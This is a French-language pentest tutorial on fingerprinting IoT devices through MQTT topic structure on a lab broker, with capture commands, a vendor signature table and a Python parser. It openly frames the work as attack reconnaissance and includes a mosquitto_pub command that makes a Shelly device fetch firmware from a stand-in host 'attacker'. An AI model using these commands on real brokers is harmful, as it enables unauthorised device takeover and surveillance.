Device Fingerprinting via MQTT

practical

Device Fingerprinting via MQTT

Avant d'attaquer un device IoT, encore faut-il savoir ce qu'il est. La structure des topics MQTT est une mine d'or de fingerprinting.

Capture exhaustive

mosquitto_sub -h broker.lab.local -t '#' -t '$SYS/#' -v \
  | tee mqtt_recon.log

Laissez tourner au moins une heure. Découpez par préfixe :

awk '{print $1}' mqtt_recon.log | cut -d/ -f1 | sort -u

Signatures de fabricants

Préfixe topic Fabricant Indice
shellies/<id>/... Allterco Shelly shellies/shelly1-AABBCC/relay/0
zigbee2mqtt/<friendly> Zigbee2MQTT bridge zigbee2mqtt/bridge/info
tele/<dev>/STATE Tasmota JSON avec Vcc, Wifi.RSSI
homeassistant/<comp>/<id>/config HA discovery device.manufacturer
$aws/things/<name>/shadow AWS IoT shadow document
devices/<id>/messages/... Azure IoT Hub rare en public
homie/<id>/$<attr> Homie convention self-describing

Un device Shelly :

shellies/shelly1-A4CF12B3D4E5/info
shellies/shelly1-A4CF12B3D4E5/relay/0
shellies/shelly1-A4CF12B3D4E5/online

L'ID embarque la MAC. OUI lookup → fabricant + pays.

Extraction structurée

import re, json
from collections import defaultdict

devices = defaultdict(dict)
mac_re = re.compile(r"([0-9A-F]{12}|[0-9A-F]{2}(?::[0-9A-F]{2}){5})", re.I)

with open("mqtt_recon.log") as f:
    for line in f:
        try:
            topic, payload = line.strip().split(" ", 1)
        except ValueError:
            continue

        if topic.startswith("shellies/"):
            parts = topic.split("/")
            dev_id = parts[1]
            devices[dev_id]["vendor"] = "Shelly"
            if topic.endswith("/info"):
                try:
                    devices[dev_id].update(json.loads(payload))
                except: pass

        elif topic.startswith("tele/") and topic.endswith("/STATE"):
            dev_id = topic.split("/")[1]
            devices[dev_id]["vendor"] = "Tasmota"
            try:
                data = json.loads(payload)
                devices[dev_id]["wifi"] = data.get("Wifi", {})
            except: pass

        m = mac_re.search(topic)
        if m:
            devices[m.group(1)]["mac_in_topic"] = True

for dev_id, info in devices.items():
    print(dev_id, info)

Topics OTA — les plus précieux

mosquitto_sub -h broker.lab.local -t '#' -v | grep -iE 'ota|firmware|upgrade'

Un Shelly accepte par exemple :

mosquitto_pub -h broker.lab.local \
  -t 'shellies/shelly1-AABBCC/command' \
  -m '{"update_url":"http://attacker/firmware.bin"}'

Sans ACL stricte, vous flashez le device avec votre propre firmware. Vérifiez la signature requise par le bootloader, sinon le device se brique.

Corrélation

  • Wi-Fi local (airodump) pour RSSI et triangulation
  • DHCP leases pour hostnames
  • DNS pour mqtt.local, home-assistant.local
  • mDNS (avahi-browse -a) pour capacités annoncées

Versions vulnérables

import json
sample = '{"mac":"A4CF12B3D4E5","fw":"20210115-114019/v1.9.5@cb1d6f88"}'
info = json.loads(sample)
print(info["fw"])  # v1.9.5 -> check CVE database

Construisez un inventaire propre : MAC, vendor, modèle, firmware, topic de commande, topic OTA. C'est cet inventaire qui guidera les attaques ciblées.